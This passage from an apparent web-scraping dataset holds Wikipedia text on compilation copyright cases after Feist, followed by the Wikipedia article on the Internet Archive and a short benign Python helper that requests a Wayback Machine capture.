West's citation claims were challenged in 1994 by legal publisher Matthew Bender Company and by a small CD-ROM publisher HyperLaw, Inc. HyperLaw intervened, joining Matthew Bender in the citation challenge and separately challenging West's text copyright claims. In 1998, the Second Circuit found that West did not have a protectable copyright interest in its first-page citations or its internal pagination citations (Matthew Bender v. West, Citation Appeal). 6 The Second Circuit thereby rejected a Minnesota district court's 1996 determination (Oasis Publishing Co. v. West Publishing Co., 924 F.Supp. 918, D. Minn.) that Feist does not change the outcome of West. In the same case, but in separate decisions in which Matthew Bender was not involved, HyperLaw successfully challenged West's text claims. Judge John S. Martin ruled HyperLaw's favor against West in the May 1996 U.S. District Court decision Matthew Bender v. West, No. 94 Civ. 0589, 1997 WL 266972 (S.D.N.Y. May 19, 1997), aff'd, 158 F. 3d 674 (2nd Cir. 1998), cert. denied sub. nom. West v. Hyperlaw, 526 U.S. 1154 (1999). 7 West lost to HyperLaw on appeal to the U.S. Court of Appeals for the Second Circuit and the U.S. Supreme Court denied certiorari. 8 After West v. Mead, Mead Data and Lexis were acquired by Reed Elsevier, a large English-Dutch based publisher. During Matthew Bender v. West, Reed Elsevier and Matthew Bender entered into a strategic relationship, culminating in Reed Elsevier's acquisition of Matthew Bender in 1998, just after the Second Circuit appeals were argued. Reed Elsevier was now on West's side and filed an amicus brief opposing HyperLaw and supporting West. Thus, though the name of the case might suggest that Matthew Bender challenged West on the text claim, by the middle of the case Matthew Bender was on West's side on the text issue. Reed Elsevier's support of West's claims to a copyright in text was consistent with the initiatives, discussed below, to sidestep Feist by implementing database protection, through legislation and treaties discussed below. Similarly, during the case, West was acquired by the Canadian-based international publisher the Thomson Corporation. Another case covering this area is Assessment Technologies v. Wiredata (2003), 9 in which the Seventh Circuit Court of Appeals ruled that a copyright holder in a compilation of public domain data cannot use that copyright to prevent others from using the underlying public domain data, but may only restrict the specific format of the compilation if that format is itself sufficiently creative. Assessment Technologies also held that it is a fair use of a copyrighted work to reverse engineer that work in order to gain access to uncopyrightable facts. Assessment Technologies also created new law, stating that it is a copyright misuse and an abuse of process to attempt to use a contract or license agreement based on one's copyright to protect uncopyrightable facts. In the late 1990s, Congress attempted to pass laws to protect collections of data, 10 but the measures failed. 11 By contrast, the European Union has a sui generis (specific to that type of work) intellectual property protection for collections of data. The applicability of copyright to phone directories has come up in several other countries. In Canada, the appeal-level case of Tele-Direct (Publications) Inc. v. American Business Information Inc. (1997) 76 C.P.R. (3d) 296 (F.C.A.) reached a similar result to Feist's. 
But the Supreme Court partially backed away from the originality doctrine in CCH Canadian Ltd. v. Law Society of Upper Canada. Under CCH Canadian, someone may assert protection in a database where the facts are themselves not copied from another source. For example, a person may assert protection in a collection of their own recipes, but may not assert protection in a database of facts about persons and their ancestry compiled from census records. In Australia, the Federal Court decision Desktop Marketing Systems v Telstra 12 followed the UK approach in Walter v Lane and ruled that copyright law did, in fact, follow the "sweat of the brow" doctrine. But Desktop v Telstra held, like CCH Canadian, that collections of facts must not be copied from other sources to be eligible for protection. In 2010, the Telstra decision was overturned by Justice Gordon in Telstra v Phone Directories, 13 following the decision of the High Court in IceTV v Nine Network. 14 In India, the Supreme Court case Eastern Book Company Ors vs D.B. Modak Anr (where the respondents had compiled CD-ROMs of Supreme Court rulings with text sourced from copyedited publications of them by Eastern Book Company, albeit with copyrightable headnotes and other original content removed) cited both Feist and CCH Canadian, establishing that a work needed to demonstrate labor or effort—but not only labor—in order to be an "original", copyrightable work. In this case, the Court held that the copy-edited text of public domain court documents did not "depict independent creation even a modicum of creativity. This ruling contrasted previous rulings such as Govindan v E.M. Gopalakrishna Kone and Burlington Home Shipping Pvt Ltd v Rajnish Chibber, which followed the British approach of skill and labor. Congress has been considering whether to implement a treaty negotiated at the World Trade Organization. Part of the Uruguay Round Agreement resulted in text that reads, in Part II, Section 1, Article 10: Compilations of data or other material, whether in machine readable or other form, which by reason of the selection or arrangement of their contents constitute intellectual creations shall be protected as such. Such protection, which shall not extend to the data or material itself, shall be without prejudice to any copyright subsisting in the data or material itself. The text mirrors that of Article 2(5) of the Berne Convention, which applies to "collections of literary or artistic works". This treaty provision is broadly in line with the United States Copyright Act and the Act's case law, which protects compilations of data whose "selection and arrangement" is sufficiently original. See 17 U.S.C. 101 ("compilation" as defined by the United States Copyright Act includes compilations of data). The standard for such originality is fairly low; for example, business listings have been found to meet this standard when deciding which companies should be listed and categorizing those companies required some kind of expert judgment. See Key Publ'ns, Inc. v. Chinatown Today Pub. Enters., 945 F.2d 509 (2d Cir. 1991) (applying Feist). As such, implementation of this treaty would not overrule Feist. |
642 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Internet_Archive | Internet Archive is an American nonprofit digital library website founded in 1996 by Brewster Kahle. 1 2 4 It provides free access to collections of digitized materials including websites, software applications, music, audiovisual, and print materials. The Archive also advocates for a free and open Internet. As of February 4, 2024 update , the Internet Archive held more than 44 million print materials, 10.6 million videos, 1 million software programs, 15 million audio files, 4.8 million images, 255,000 concerts, and over 835 billion web pages in its Wayback Machine. 5 Its mission is committing to provide "universal access to all knowledge". 5 The Internet Archive allows the public to upload and download digital material to its data cluster, but the bulk of its data is collected automatically by its web crawlers, which work to preserve as much of the public web as possible. Its web archive, the Wayback Machine, contains hundreds of billions of web captures. 6 7 The Archive also oversees numerous book digitization projects, collectively one of the world's largest book digitization efforts. Brewster Kahle founded the Archive in May 1996, around the same time that he began the for-profit web crawling company Alexa Internet. 8 9 The earliest known archived page on the site was saved on May 10, 1996, at 2:42 pm UTC (7:42 am PDT). By October of that year, the Internet Archive had begun to archive and preserve the World Wide Web in large amounts. 10 11 12 13 14 The archived content became more easily available to the general public in 2001, through the Wayback Machine. In late 1999, the Archive expanded its collections beyond the web archive, beginning with the Prelinger Archives. Now, the Internet Archive includes texts, audio, moving images, and software. It hosts a number of other projects: the NASA Images Archive, the contract crawling service Archive-It, and the wiki-editable library catalog and book information site Open Library. Soon after that, the Archive began working to provide specialized services relating to the information access needs of the print-disabled; publicly accessible books were made available in a protected Digital Accessible Information System (DAISY) format. 15 According to its website: 16 Most societies place importance on preserving artifacts of their culture and heritage. Without such artifacts, civilization has no memory and no mechanism to learn from its successes and failures. Our culture now produces more and more artifacts in digital form. The Archive's mission is to help preserve those artifacts and create an Internet library for researchers, historians, and scholars. In August 2012, the Archive announced 17 that it has added BitTorrent to its file download options for more than 1.3 million existing files, and all newly uploaded files. 18 19 This method is the fastest means of downloading media from the Archive, as files are served from two Archive data centers, in addition to other torrent clients which have downloaded and continue to serve the files. 18 20 On November 6, 2013, the Internet Archive's headquarters in San Francisco's Richmond District caught fire, 21 destroying equipment and damaging some nearby apartments. 
22 According to the Archive, it lost a side-building housing one of 30 of its scanning centers; cameras, lights, and scanning equipment worth hundreds of thousands of dollars; and "maybe 20 boxes of books and film, some irreplaceable, most already digitized, and some replaceable". 23 The nonprofit Archive sought donations to cover the estimated $600,000 in damage. 24 An overhaul of the site was launched as beta in November 2014, and the legacy layout was removed in March 2016. 25 26 In November 2016, Kahle announced that the Internet Archive was building the Internet Archive of Canada, a copy of the Archive to be based somewhere in Canada. The announcement received widespread coverage due to the implication that the decision to build a backup archive in a foreign country was because of the upcoming presidency of Donald Trump. 27 28 29 Kahle was quoted as saying: On November 9th in America, we woke up to a new administration promising radical change. It was a firm reminder that institutions like ours, built for the long-term, need to design for change. For us, it means keeping our cultural materials safe, private and perpetually accessible. It means preparing for a Web that may face greater restrictions. It means serving patrons in a world in which government surveillance is not going away; indeed it looks like it will increase. Throughout history, libraries have fought against terrible violations of privacy—where people have been rounded up simply for what they read. At the Internet Archive, we are fighting to protect our readers' privacy in the digital world. 27 Beginning in 2017, OCLC and the Internet Archive have collaborated to make the Archive's records of digitized books available in WorldCat. 30 Since 2018, the Internet Archive visual arts residency, which is organized by Amir Saber Esfahani and Andrew McClintock, helps connect artists with the Archive's over 48 petabytes 31 of digitized materials. Over the course of the yearlong residency, visual artists create a body of work which culminates in an exhibition. The hope is to connect digital history with the arts and create something for future generations to appreciate online or off. 32 Previous artists in residence include Taravat Talepasand, Whitney Lynn, and Jenny Odell. 33 The Internet Archive acquires most materials from donations, 34 such as hundreds of thousands of 78 rpm discs from Boston Public Library in 2017, 35 a donation of 250,000 books from Trent University in 2018, 36 and the entire collection of Marygrove College's library in 2020 after it closed. 37 All material is then digitized and retained in digital storage, while a digital copy is returned to the original holder and the Internet Archive's copy, if not in the public domain, is lent to patrons worldwide one at a time under the controlled digital lending (CDL) theory of the first-sale doctrine. 38 During the week of May 27, 2024, The Internet Archive suffered a series of distributed denial of service (DDoS) attacks that made its services unavailable intermittently, sometimes for hours at a time, over a period of several days. 39 40 41 The Archive is a 501(c)(3) nonprofit operating in the United States. In 2019, it had an annual budget of $36 million, derived from revenue from its Web crawling services, various partnerships, grants, donations, and the Kahle-Austin Foundation. 42 The Internet Archive also manages periodic funding campaigns. For instance, a December 2019 campaign had a goal of reaching $6 million in donations. 
43 The Archive is headquartered in San Francisco, California. From 1996 to 2009, its headquarters were in the Presidio of San Francisco, a former U.S. military base. Since 2009, its headquarters have been at 300 Funston Avenue in San Francisco, a former Christian Science Church. At one time, most of its staff worked in its book-scanning centers; as of 2019, scanning is performed by 100 paid operators worldwide. 44 The Archive also has data centers in three Californian cities: San Francisco, Redwood City, and Richmond. To reduce the risk of data loss, the Archive creates copies of parts of its collection at more distant locations, including the Bibliotheca Alexandrina 45 46 in Egypt and a facility in Amsterdam. 47 The Archive is a member of the International Internet Preservation Consortium 48 and was officially designated as a library by the state of California in 2007. 49 50 The Internet Archive capitalized on the popular use of the term "WABAC Machine" from a segment of The Adventures of Rocky and Bullwinkle cartoon (specifically, Peabody's Improbable History), and uses the name "Wayback Machine" for its service that allows archives of the World Wide Web to be searched and accessed. 51 This service allows users to view some of the archived web pages. The Wayback Machine was created as a joint effort between Alexa Internet (owned by Amazon.com) and the Internet Archive when a three-dimensional index was built to allow for the browsing of archived web content. 52 Hundreds of billions of web sites and their associated data (images, source code, documents, etc.) are saved in a database. The service can be used to see what previous versions of web sites used to look like, to grab original source code from web sites that may no longer be directly available, or to visit web sites that no longer even exist. Not all web sites are available because many web site owners choose to exclude their sites. As with all sites based on data from web crawlers, the Internet Archive misses large areas of the web for a variety of other reasons. A 2004 paper found international biases in the coverage, but deemed them "not intentional". 53 In 2017, the Wayback Machine director announced that its crawlers would ignore robots.txt instructions and archive pages even if website owners asked bots not to access them. 54 A "Save Page Now" archiving feature was made available in October 2013, 55 accessible on the lower right of the Wayback Machine's main page. 56 Once a target URL is entered and saved, the web page will become part of the Wayback Machine. 55 Through the Internet address web.archive.org, 57 users can upload to the Wayback Machine a large variety of contents, including PDF and data compression file formats. The Wayback Machine creates a permanent local URL of the upload content, that is accessible in the web, even if not listed while searching in the https: archive.org official website. In October 2016, it was announced that the way web pages are counted would be changed, resulting in the decrease of the archived pages counts shown. Embedded objects such as pictures, videos, style sheets, JavaScripts are no longer counted as a "web page", whereas HTML, PDF, and plain text documents remain counted. 58 In September 2020, the Internet Archive announced a partnership with Cloudflare an American content delivery network service provider to automatically index websites served via its "Always Online" services. 
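The "Save Page Now" feature described above can also be driven programmatically, which fits the scraping theme of this notebook. The sketch below assumes the public web.archive.org/save/ URL pattern and that a plain GET is enough to request a capture; rate limits, authentication options, and the exact response format of the service are not covered here, so treat it as a rough starting point rather than a definitive client.

import requests

def save_page_now(url, timeout=60):
    # Ask the Wayback Machine to capture a URL via the Save Page Now endpoint.
    # Assumption: a GET on web.archive.org/save/<url> triggers a capture and,
    # on success, ends up at the URL of the new snapshot.
    try:
        response = requests.get(f"https://web.archive.org/save/{url}", timeout=timeout)
        response.raise_for_status()
        return response.url
    except requests.RequestException as error:
        print(f"Save Page Now request failed: {error}")
        return None

print(save_page_now("https://example.com"))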
81 Created in early 2006, Archive-It 82 is a web archiving subscription service that allows institutions and individuals to build and preserve collections of digital content and create digital archives. Archive-It allows the user to customize their capture or exclusion of web content they want to preserve for cultural heritage reasons. Through a web application, Archive-It partners can harvest, catalog, manage, browse, search, and view their archived collections. 83 In terms of accessibility, the archived web sites are full text searchable within seven days of capture. 84 Content collected through Archive-It is captured and stored as a WARC file. A primary and back-up copy is stored at the Internet Archive data centers. A copy of the WARC file can be given to subscribing partner institutions for geo-redundant preservation and storage purposes to their best practice standards. 85 Periodically, the data captured through Archive-It is indexed into the Internet Archive's general archive. As of March 2014 update , Archive-It had more than 275 partner institutions in 46 U.S. states and 16 countries that have captured more than 7.4 billion URLs for more than 2,444 public collections. Archive-It partners are universities and college libraries, state archives, federal institutions, museums, law libraries, and cultural organizations, including the Electronic Literature Organization, North Carolina State Archives and Library, Stanford University, Columbia University, American University in Cairo, Georgetown Law Library, and many others. In September 2020 Internet Archive announced a new initiative to archive and preserve open access academic journals, called Internet Archive Scholar. 86 87 88 Its full-text search index includes over 25 million research articles and other scholarly documents preserved in the Internet Archive. The collection spans from digitized copies of eighteenth century journals through the latest open access conference proceedings and pre-prints crawled from the World Wide Web. In 2021, the Internet Archive announced the initial version of the General Index, a publicly available index to a collection of 107 million academic journal articles. 89 90 The scanning performed by the Internet Archive is financially supported by libraries and foundations. 91 As of November 2008 update , when there were approximately 1 million texts, the entire collection was greater than 0.5 petabytes, which included raw camera images, cropped and skewed images, PDFs, and raw OCR data. 92 As of July 2013 update , the Internet Archive was operating 33 scanning centers in five countries, digitizing about 1,000 books a day for a total of more than 2 million books, in a total collection of 4.4 million books including material digitized by others and fed into the Internet Archive; at that time, users were performing more than 15 million downloads per month. 93 The material digitized by others includes more than 300,000 books that were contributed to the collection, between about 2006 and 2008, by Microsoft through its Live Search Books project, which also included financial support and scanning equipment directly donated to the Internet Archive. 94 On May 23, 2008, Microsoft announced it would be ending its Live Book Search project and would no longer be scanning books, donating its remaining scanning equipment to its former partners. 94 Around October 2007, Archive users began uploading public domain books from Google Book Search. 
95 As of November 2013 update , there were more than 900,000 Google-digitized books in the Archive's collection; 96 the books are identical to the copies found on Google, except without the Google watermarks, and are available for unrestricted use and download. a Brewster Kahle revealed in 2013 that this archival effort was coordinated by Aaron Swartz, who, with a "bunch of friends", downloaded the public domain books from Google slowly enough and from enough computers to stay within Google's restrictions. They did this to ensure public access to the public domain. The Archive ensured the items were attributed and linked back to Google, which never complained, while libraries "grumbled". According to Kahle, this is an example of Swartz's "genius" to work on what could give the most to the public good for millions of people. 97 In addition to books, the Archive offers free and anonymous public access to more than four million court opinions, legal briefs, or exhibits uploaded from the United States Federal Courts' PACER electronic document system via the RECAP web browser plugin. These documents had been kept behind a federal court paywall. On the Archive, they had been accessed by more than six million people by 2013. 97 The Archive's BookReader web app, 98 built into its website, has features such as single-page, two-page, and thumbnail modes; fullscreen mode; page zooming of high-resolution images; and flip page animation. 98 99 The Open Library is another project of the Internet Archive. The project seeks to include a web page for every book ever published: it holds 25 million catalog records of editions. It also seeks to be a web-accessible public library: it contains the full texts of approximately 1,600,000 public domain books (out of the more than five million from the main texts collection), as well as in-print and in-copyright books, 100 many of which are fully readable, downloadable 101 102 and full-text searchable; 103 it offers a two-week loan of e-books in its controlled digital lending program for over 647,784 books not in the public domain, in partnership with over 1,000 library partners from six countries 93 104 after a free registration on the web site. Open Library is a free and open-source software project, with its source code freely available on GitHub. The Open Library faces objections from some authors and the Society of Authors, who hold that the project is distributing books without authorization and is thus in violation of copyright laws, 105 and four major publishers initiated a copyright infringement lawsuit against the Internet Archive in June 2020 to stop the Open Library project. 106 Many large institutional sponsors have helped the Internet Archive provide millions of scanned publications (text items). 107 Some sponsors that have digitized large quantities of texts include the University of Toronto's Robarts Library, the University of Alberta Libraries, the University of Ottawa, the Library of Congress, Boston Library Consortium member libraries, the Boston Public Library, the Princeton Theological Seminary Library, and many others. 108 In 2017, the MIT Press authorized the Internet Archive to digitize and lend books from the press's backlist, 109 with financial support from the Arcadia Fund. 110 111 A year later, the Internet Archive received further funding from the Arcadia Fund to invite some other university presses to partner with the Internet Archive to digitize books, a project called "Unlocking University Press Books". 
112 113 The Library of Congress created numerous Handle System identifiers that pointed to free digitized books in the Internet Archive. 114 The Internet Archive and Open Library are listed on the Library of Congress website as a source of e-books. 115 In addition to web archives, the Internet Archive maintains extensive collections of digital media that are attested by the uploader to be in the public domain in the United States or licensed under a license that allows redistribution, such as Creative Commons licenses. Media are organized into collections by media type (moving images, audio, text, etc.), and into sub-collections by various criteria. Each of the main collections includes a "Community" sub-collection (formerly named "Open Source") where general contributions by the public are stored. The Audio Archive is an audio archive that includes music, audiobooks, news broadcasts, old time radio shows, podcasts, and a wide variety of other audio files. As of January 2023 update , there are more than 15,000,000 free digital recordings in the collection. The subcollections include audio books and poetry, podcasts, non-English audio, and many others. 116 The sound collections are curated by B. George, director of the ARChive of Contemporary Music. 117 Next to the stock HTML5 audio player, Winamp-resembling Webamp is available. A project to preserve recordings of amateur radio transmissions, with funding from the Amateur Radio Digital Communications foundation. 118 119 The Live Music Archive sub-collection includes more than 170,000 concert recordings from independent musicians, as well as more established artists and musical ensembles with permissive rules about recording their concerts, such as the Grateful Dead, and more recently, The Smashing Pumpkins. Also, Jordan Zevon has allowed the Internet Archive to host a definitive collection of his father Warren Zevon's concert recordings. The Zevon collection ranges from 1976 to 2001 and contains 126 concerts including 1,137 songs. 120 The Great 78 Project aims to digitize 250,000 78 rpm singles (500,000 songs) from the period between 1880 and 1960, donated by various collectors and institutions. It has been developed in collaboration with the Archive of Contemporary Music and George Blood Audio, responsible for the audio digitization. 117 The Archive has a collection of freely distributable music that is streamed and available for download via its Netlabels service. The music in this collection generally has Creative Commons-license catalogs of virtual record labels. 121 122 This collection contains more than 3.5 million items. 123 Cover Art Archive, Metropolitan Museum of Art Gallery Images, NASA Images, Occupy Wall Street Flickr Archive, and USGS Maps are some sub-collections of Image collection. The Cover Art Archive is a joint project between the Internet Archive and MusicBrainz, whose goal is to make cover art images on the Internet. As of April 2021, update this collection contains more than 1,400,000 items. 124 The images of this collection are from the Metropolitan Museum of Art. This collection contains more than 140,000 items. 125 The NASA Images archive was created through a Space Act Agreement between the Internet Archive and NASA to bring public access to NASA's image, video, and audio collections in a single, searchable resource. The IA NASA Images team worked closely with all of the NASA centers to keep adding to the ever-growing collection. 
126 The nasaimages.org site launched in July 2008 and had more than 100,000 items online at the end of its hosting in 2012. This collection contains Creative Commons-licensed photographs from Flickr related to the Occupy Wall Street movement. This collection contains more than 15,000 items. 127 This collection contains more than 59,000 items from Libre Map Project. 128 One of the sub-collections of the Internet Archive's Video Archive is the Machinima Archive. This small section hosts many Machinima videos. Machinima is a digital artform in which computer games, game engines, or software engines are used in a sandbox-like mode to create motion pictures, recreate plays, or even publish presentations or keynotes. The archive collects a range of Machinima films from internet publishers such as Rooster Teeth and Machinima.com as well as independent producers. The sub-collection is a collaborative effort among the Internet Archive, the How They Got Game research project at Stanford University, the Academy of Machinima Arts and Sciences, and Machinima.com. 129 This collection contains approximately 160,000 microfilmed items from a variety of libraries including the University of Chicago Libraries, the University of Illinois at Urbana-Champaign, the University of Alberta, Allen County Public Library, and the National Technical Information Service. 130 131 The Internet Archive holds a collection of approximately 3,863 feature films. 132 Additionally, the Internet Archive's Moving Image collection includes: newsreels, classic cartoons, pro- and anti-war propaganda, The Video Cellar Collection, Skip Elsheimer's "A.V. Geeks" collection, early television, and ephemeral material from Prelinger Archives, such as advertising, educational, and industrial films, as well as amateur and home movie collections. Subcategories of this collection include: Open Educational Resources is a digital collection at archive.org. This collection contains hundreds of free courses, video lectures, and supplemental materials from universities in the United States and China. The contributors of this collection are ArsDigita University, Hewlett Foundation, MIT, Monterey Institute, and Naropa University. 135 In September 2012, the Internet Archive launched the TV News Search Borrow service for searching U.S. national news programs. 136 The service is built on closed captioning transcripts and allows users to search and stream 30 second video clips. Upon launch, the service contained "350,000 news programs collected over 3 years from national U.S. networks and stations in San Francisco and Washington D.C. 137 According to Kahle, the service was inspired by the Vanderbilt Television News Archive, a similar library of televised network news programs. 138 In contrast to Vanderbilt, which limits access to streaming video to individuals associated with subscribing colleges and universities, the TV News Search Borrow allows open access to its streaming video clips. In 2013, the Archive received an additional donation of "approximately 40,000 well-organized tapes" from the estate of a Philadelphia woman, Marion Stokes. Stokes "had recorded more than 35 years of TV news in Philadelphia and Boston with her VHS and Betamax machines. 139 Brooklyn Museum collection contains approximately 3,000 items from Brooklyn Museum. 140 In December 2020, the film research library of Lillian Michelson was donated to the archive. 
141 Voicing a strong reaction to the idea of books simply being thrown away, and inspired by the Svalbard Global Seed Vault, Kahle now envisions collecting one copy of every book ever published. "We're not going to get there, but that's our goal", he said. Alongside the books, Kahle plans to store the Internet Archive's old servers, which were replaced in 2010. 142 The Internet Archive has "the largest collection of historical software online in the world", spanning 50 years of computer history in terabytes of computer magazines and journals, books, shareware discs, FTP sites, video games, etc. The Internet Archive has created an archive of what it describes as "vintage software", as a way to preserve them. 143 The project advocated for an exemption from the United States Digital Millennium Copyright Act to permit them to bypass copy protection, which the United States Copyright Office approved in 2003 for a period of three years. 144 The Archive does not offer the software for download, as the exemption is solely "for the purpose of preservation or archival reproduction of published digital works by a library or archive. 145 The Library of Congress renewed the exemption in 2006, and in 2009 indefinitely extended it pending further rulemakings. 146 The Library reiterated the exemption as a "Final Rule" with no expiration date in 2010. 147 In 2013, the Internet Archive began to provide select video games browser-playable via MESS, for instance the Atari 2600 game E.T. the Extra-Terrestrial. 148 Since December 23, 2014, the Internet Archive presents, via a browser-based DOSBox emulation, thousands of DOS PC games 149 150 151 152 for "scholarship and research purposes only". 153 154 155 In November 2020, the Archive introduced a new emulator for Adobe Flash called Ruffle, and began archiving Flash animations and games ahead of the December 31, 2020, end-of-life for the Flash plugin across all computer systems. 156 A combined hardware software system has been developed that performs a safe method of digitizing content. 157 158 From 2012 to November 2015, the Internet Archive operated the Internet Archive Federal Credit Union, a federal credit union based in New Brunswick, New Jersey, with the goal of providing access to low- and middle-income people. Throughout its short existence, the IAFCU experienced significant conflicts with the National Credit Union Administration, which severely limited the IAFCU's loan portfolio and concerns over serving Bitcoin firms. At the time of its dissolution, it consisted of 395 members and was worth $2.5 million. 159 160 Since 2019, 161 the Internet Archive organizes an event called Decentralized Web Camp (DWeb Camp). It is an annual camp that brings together a diverse global community of contributors in a natural setting. The camp aims to tackle real-world challenges facing the web and co-create decentralized technologies for a better internet. It aims to foster collaboration, learning, and fun while promoting principles of trust, human agency, mutual respect, and ecological awareness. 162 On 30 September 2021, as a part of its 25th anniversary celebration, Internet Archive launched the "Wayforward Machine", a satirical, fictional website covered with pop-ups asking for personal information. The site was intended to depict a fictional dystopian timeline of real-world events leading to such a future, such as the repeal of Section 230 of the United States Code in 2022 and the introduction of advertising implants in 2041. 
163 164 The Great Room of the Internet Archive features a collection of more than 100 ceramic figures representing employees of the Internet Archive, with the 100th statue immortalizing Aaron Swartz. This collection, inspired by the statues of the Xian warriors in China, was commissioned by Brewster Kahle, sculpted by Nuala Creed, and as of 2014, is ongoing. 165 The Internet Archive visual arts residency, 166 organized by Amir Saber Esfahani, is designed to connect emerging and mid-career artists with the Archive's millions of collections and to show what is possible when open access to information intersects with the arts. During this one-year residency, selected artists develop a body of work that responds to and utilizes the Archive's collections in their own practice. 167 On May 8, 2008, it was revealed that the Internet Archive had successfully challenged an FBI national security letter asking for logs on an undisclosed user. 171 172 On November 28, 2016, it was revealed that a second FBI national security letter had been successfully challenged that had been asking for logs on another undisclosed user. 173 The Internet Archive blacked out its web site for 12 hours on January 18, 2012, in protest of the Stop Online Piracy Act and the PROTECT IP Act bills, two pieces of legislation in the United States Congress that they argued would "negatively affect the ecosystem of web publishing that led to the emergence of the Internet Archive". This occurred in conjunction with the English Wikipedia blackout, as well as numerous other protests across the Internet. 174 The Internet Archive is a member of the Open Book Alliance, which has been among the most outspoken critics of the Google Book Settlement. The Archive advocates an alternative digital library project. 175 On October 9, 2016, the Internet Archive was temporarily blocked in Turkey after it was used (amongst other file hosting services) by hackers to host 17 GB of leaked government emails. 176 177 Because the Internet Archive only lightly moderates uploads, it includes resources that may be valued by extremists and the site may be used by them to evade block listing. In February 2018, the Counter Extremism Project said that the Archive hosted terrorist videos, including the beheading of Alan Henning, and had declined to respond to requests about the videos. 178 In May 2018, a report published by the cyber-security firm Flashpoint stated that the Islamic State was using the Internet Archive to share its propaganda. 179 Chris Butler, from the Internet Archive, responded that they regularly spoke to the US and EU governments about sharing information on terrorism. 179 In April 2019, Europol, acting on a referral from French police, asked the Internet Archive to remove 550 sites of "terrorist propaganda". 180 The Archive rejected the request, saying that the reports were wrong about the content they pointed to, or were too broad for the organization to comply with. 180 On July 14, 2021, the Internet Archive held a joint "Referral Action Day" with Europol to target terrorist videos. 181 A 2021 article said that jihadists regularly used the Internet Archive for "dead drops" of terrorist videos. 182 In January 2022, a former UCLA lecturer's 800 page manifesto, containing racist ideas and threats against UCLA staff, was uploaded to the Internet Archive. 183 The manifesto was removed by the Internet Archive after a week, amidst discussion about whether such documents should be preserved by archivists or not. 
183 Another 2022 paper found "an alarming volume of terrorist, extremist, and racist material on the Internet Archive". 184 A 2023 paper reported that Neo-Nazis collect links to online, publicly available resources to be shared with new recruits. As the Internet Archive hosts uploaded texts that are not allowed on other websites, Nazi and neo-Nazi books in the Archive (e.g., The Turner Diaries) frequently appear on these lists. These lists also feature older, public domain material created when white supremacist views were more mainstream. 185 In the midst of the COVID 19 pandemic which closed many schools, universities, and libraries, the Archive announced on March 24, 2020, that it was creating the National Emergency Library by removing the lending restrictions it had in place for 1.4 million digitized books in its Open Library but otherwise limiting users to the number of books they could check out and enforcing their return; normally, the site would only allow one digital lending for each physical copy of the book they had, by use of an encrypted file that would become unusable after the lending period was completed. 4 This Library would remain as such until at least June 30, 2020, or until the US national emergency was over, whichever came later. 186 At launch, the Internet Archive allowed authors and rightholders to submit opt-out requests for their works to be omitted from the National Emergency Library. 187 188 189 The Internet Archive said the National Emergency Library addressed an "unprecedented global and immediate need for access to reading and research material" due to the closures of physical libraries worldwide. 190 They justified the move in a number of ways. Legally, they said they were promoting access to those inaccessible resources, which they claimed was an exercise in fair use principles. The Archive continued implementing their controlled digital lending policy that predated the National Emergency Library, meaning they still encrypted the lent copies and it was no easier for users to create new copies of the books than before. An ultimate determination of whether or not the National Emergency Library constituted fair use could only be made by a court. Morally, they also pointed out that the Internet Archive was a registered library like any other, that they either paid for the books themselves or received them as donations, and that lending through libraries predated copyright restrictions. 187 191 The Archive had already been criticized by authors and publishers for its prior lending approach, and upon announcement of the National Emergency Library, authors, publishers, and groups representing both took further issue with The Archive and its Open Library project, equating the move to copyright infringement and digital piracy, and using the COVID 19 pandemic as a reason to push the boundaries of copyright. 189 192 193 194 After the works of some of these authors were ridiculed in responses, the Internet Archive's Jason Scott requested that supporters of the National Emergency Library not denigrate anyone's books: "I realize there's strong debate and disagreement here, but books are life-giving and life-changing and these writers made them. 195 In November 2005, free downloads of Grateful Dead concerts were removed from the site, following what seemed to be disagreements between some of the former band members. John Perry Barlow identified Bob Weir, Mickey Hart, and Bill Kreutzmann as the instigators of the change, according to an article in The New York Times. 
196 Phil Lesh, a founding member of the band, commented on the change in a November 30, 2005, posting to his personal web site: It was brought to my attention that all of the Grateful Dead shows were taken down from Archive.org right before Thanksgiving. I was not part of this decision making process and was not notified that the shows were to be pulled. I do feel that the music is the Grateful Dead's legacy and I hope that one way or another all of it is available for those who want it. 197 A November 30 forum post from Brewster Kahle summarized what appeared to be the compromise reached among the band members. Audience recordings could be downloaded or streamed, but soundboard recordings were to be available for streaming only. Concerts have since been re-added. 198 In February 2016, Internet Archive users had begun archiving digital copies of Nintendo Power, Nintendo's official magazine for their games and products, which ran from 1988 to 2012. The first 140 issues had been collected, before Nintendo had the archive removed on August 8, 2016. In response to the take-down, Nintendo told gaming website Polygon, Nintendo must protect our own characters, trademarks and other content. The unapproved use of Nintendo's intellectual property can weaken our ability to protect and preserve it, or to possibly use it for new projects". 199 In August 2017, the Department of Telecommunications of the Government of India blocked the Internet Archive along with other file-sharing websites, in accordance with two court orders issued by the Madras High Court, 200 citing piracy concerns after copies of two Bollywood films were allegedly shared via the service. 201 The HTTP version of the Archive was blocked but it remained accessible using the HTTPS protocol. 200 In 2023, the Internet Archive became a popular site for Indians to watch the first episode of India: The Modi Question, a BBC documentary. 202 The video was reported to have been removed by the Archive on January 23. 202 The Internet Archive then stated, on January 27, that they had removed the video in response to a BBC request under the Digital Millennium Copyright Act. 203 The Great 78 Project had been started on the Internet Archive to store digitized versions of pre 1972 songs and albums from 78 rpm phonograph records, for the stated purpose of "the preservation, research and discovery of 78rpm records". The project had started in 2016, at which time the copyright on pre 1972 recordings only had limited duration; in 2019, the U.S. Congress passed the Music Modernization Act which extended pre 1972 recording copyrights to 2067. In August 2023, Sony Music Entertainment and five other major music publishers sued the Internet Archive over the Great 78 Project, asserting the project was engaged in copyright infringement, denying the claim about research purposes since all the music was available via their respective digital and streaming music services. The companies were seeking the statutory damages for nearly 2500 songs named in the suit, for a total of $347 million. 204 The Internet Archive has argued that the crackles and pops in the recordings mean that it is within the doctrine of "fair use" to digitize them for preservation. The plaintiffs said in response, "if ever there were a theory of fair use invented for litigation, this is it". 
